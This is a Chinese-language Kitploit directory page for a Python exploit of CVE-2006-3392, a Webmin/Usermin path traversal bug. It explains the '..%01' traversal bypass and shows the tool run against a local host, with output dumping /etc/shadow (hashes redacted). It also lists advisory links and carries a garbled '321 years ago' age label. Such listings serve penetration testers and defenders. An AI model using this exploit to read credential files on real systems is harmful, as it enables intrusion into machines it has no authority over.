Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2006-3392 — Python利用程序,针对CVE-2006-3392——Webmin和Usermin中的路径遍历漏洞,允许远程攻击者通过编码的目录遍历序列读取任意文件。 | Kitploit
工具/GitHubGitHub/brosck/cve-2006-3392
侦察漏洞分析漏洞利用信息收集Web安全渗透测试
GitHubbrosck/cve-2006-3392

CVE-2006-3392

Python利用程序,针对CVE-2006-3392——Webmin和Usermin中的路径遍历漏洞,允许远程攻击者通过编码的目录遍历序列读取任意文件。

查看仓库
321年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2006-3392

Description

Webmin 1.290之前版本和Usermin 1.220之前版本在解码HTML之前调用了simplify_path函数,这允许远程攻击者读取任意文件,例如使用"..%01"序列,该序列绕过了在从文件名中移除"%01"等字节之前对"../"序列的移除。注意:这是与CVE-2006-3274不同的问题。

Execution

root@kitploit:~
$ python3 CVE-2006-3392.py -u http://127.0.0.1:10000


   _______      ________    ___   ___   ___    __       ____ ____   ___ ___  
  / ____\ \    / /  ____|  |__ \ / _ \ / _ \  / /      |___ \___ \ / _ \__ \ 
 | |     \ \  / /| |__ ______ ) | | | | | | |/ /_ ______ __) |__) | (_) | ) |
 | |      \ \/ / |  __|______/ /| | | | | | | '_ \______|__ <|__ < \__, |/ / 
 | |____   \  /  | |____    / /_| |_| | |_| | (_) |     ___) |__) |  / // /_ 
  \_____|   \/   |______|  |____|\___/ \___/ \___/     |____/____/  /_/|____|

                              [Coded by Brosck]

[*] File path: /etc/shadow
root:[REDACTED]:17406:0:99999:7:::
daemon:*:17047:0:99999:7:::
bin:*:17047:0:99999:7:::
sys:*:17047:0:99999:7:::
sync:*:17047:0:99999:7:::
games:*:17047:0:99999:7:::
man:*:17047:0:99999:7:::
lp:*:17047:0:99999:7:::
mail:*:17047:0:99999:7:::
news:*:17047:0:99999:7:::
uucp:*:17047:0:99999:7:::
proxy:*:17047:0:99999:7:::
www-data:*:17047:0:99999:7:::
backup:*:17047:0:99999:7:::
list:*:17047:0:99999:7:::
irc:*:17047:0:99999:7:::
gnats:*:17047:0:99999:7:::
nobody:*:17047:0:99999:7:::
libuuid:!:17047:0:99999:7:::
Debian-exim:!:17047:0:99999:7:::
statd:*:17047:0:99999:7:::
sshd:*:17047:0:99999:7:::
mysql:!:17047:0:99999:7:::
proftpd:!:17406:0:99999:7:::
ftp:*:17406:0:99999:7:::
webmaster:[REDACTED]:17406:0:99999:7:::

References

  • https://nvd.nist.gov/vuln/detail/CVE-2006-3392
  • http://attrition.org/pipermail/vim/2006-July/000923.html
  • http://attrition.org/pipermail/vim/2006-June/000912.html
  • http://secunia.com/advisories/20892
  • http://secunia.com/advisories/21105
  • http://secunia.com/advisories/21365
  • http://secunia.com/advisories/22556
  • http://security.gentoo.org/glsa/glsa-200608-11.xml
  • http://www.debian.org/security/2006/dsa-1199
  • http://www.kb.cert.org/vuls/id/999601
  • http://www.mandriva.com/security/advisories?name=MDKSA-2006:125
  • http://www.osvdb.org/26772
  • http://www.securityfocus.com/archive/1/439653/100/0/threaded
  • http://www.securityfocus.com/archive/1/440125/100/0/threaded
  • http://www.securityfocus.com/archive/1/440466/100/0/threaded
  • http://www.securityfocus.com/archive/1/440493/100/0/threaded
  • http://www.securityfocus.com/bid/18744
  • http://www.vupen.com/english/advisories/2006/2612
  • http://www.webmin.com/changes.html
下载工具